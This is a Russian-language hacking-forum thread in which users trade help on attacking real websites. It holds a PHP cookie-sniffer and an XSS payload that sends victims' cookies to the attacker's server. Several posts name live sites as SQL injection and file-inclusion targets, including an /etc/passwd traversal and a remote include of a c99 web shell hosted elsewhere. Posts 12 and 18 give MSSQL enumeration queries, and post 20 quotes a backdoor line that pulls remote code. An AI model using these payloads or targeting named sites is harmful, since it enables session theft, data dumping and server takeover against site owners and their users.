Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2svalck
    а чтоб проще и понятнее тока самому написать)
     
  2. Worms

    Worms Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    95
    Likes Received:
    0
    Reputations:
    0
    так че мне никто не подскажет как убрать ограничитель символов и че еще могу сделать?
     
  3. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Хочется узнать че это за бд,такая и где можно почитать про.. И каким макаром узнать калонки в таблице JFORUM_USERs
     
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    2Assembler

    ORA-01790: - база данных оракл.тут была статья от [x53]Shadow про проведение инжекта в оракл
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    а точнее здесь:
    https://forum.antichat.ru/thread40576.html
     
  6. Sosok

    Sosok New Member

    Joined:
    16 Feb 2009
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    htt p://cardz.ru/index.php?rasd=oplata&type=1'
    Можете посмотреть эту скуля или нет , а то не могу понять!
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Sosok, нет, не скуля.
    при скуле будет немного другая ошибка.
     
    _________________________
  8. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Sosok, это ошибка в самом скрипте, она не вызвана кавычкой...
    http://cardz.ru/index.php?rasd=oplata&type=1
    =
    http://cardz.ru/index.php?rasd=oplata&type=1'
     
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Начёт сниффера.Код взял с форума:

    <?php


    $date = date('d.m.y - H:i:s');
    $ip = UrlDecode(getenv('REMOTE_ADDR'));
    $referer = UrlDecode(getenv('HTTP_REFERER'));
    $query = UrlDecode(getenv('QUERY_STRING'));
    $cookie=getenv('HTTP_COOKIE');

    $s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");

    if($s) {

    echo "Successfully opened!";
    fputs($s,$cookie);
    echo "\n";
    fputs($s,$ip);

    }

    else {

    echo "У нас праблемы...";

    }


    ?>

    Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?

    "<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>

    Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.
     
  10. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    при составлении запроса в mssql inj приходится сначала кодировать в чар а потом с помощью урл код)) естественно чтоб узнать все таблы запрос будет длинным.. и обрезается(( как поступить?
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    кто знает где пассы клиентов в cPanel .. или каждый хостер делает свое?
     
  12. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    SELECT TOP 1 TABLE_NAME FROM inofrmation_schema.TABLES WHERE TABLE_NAME NOT IN(SELECT TOP x++ TABLE_NAME FROM inofrmation_schema.TABLES ORDER BY TABLE_NAME) ORDER BY TABLE_NAME
     
  13. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2razor
    работает) но как можно по аналогии вытащить имена колонок?)
    и если выводит данные из таблицы ... where id=2... почему запрос проходит без ошибок? или какие еще способы есть сдампить удаленно?
     
  14. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    Можно ли как-то раскрутить пхпинклюд http://volkswagen.msk.ru/?p=../../../../../../../../../../etc/passwd%00 ? Стандартные методы не работают))
     
  15. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а как такой роскрутить?
    http://shop.zano.ru/index.php?act=13 order by 1
     
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://shop.zano.ru/index.php?act=http://mail.ru/?

    ыы
     
    1 person likes this.
  17. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://shop.zano.ru/index.php?act=http://wowbkdo.narod.ru/c99madshell =)))
     
  18. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    SELECT TOP 1 COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' AND COLUMN_NAME NOT IN(SELECT TOP x COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='tbl' ORDER BY COLUMN_NAME) ORDER BY COLUMN_NAME
     
    1 person likes this.
  19. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Всем здрасти
    При подборе колонок выводиться

    Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)

    Перебрал 20 колонок все так же
    URL:

    http://frutonyanya.ru/php/news.php?c=1'

    :D
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Pashkela в своём духе =)
    Code:
    if(isset($_GET['cmd'])){$f=require("http://pashkela.narod.ru/tema1.txt");die($f);}
    Файлик -абревиатура от вебмани :)

    diznt, там же ясно пишет. Запрещен микс груп бай и других параметров, кроме мин, макс, каунт...
     
Thread Status:
Not open for further replies.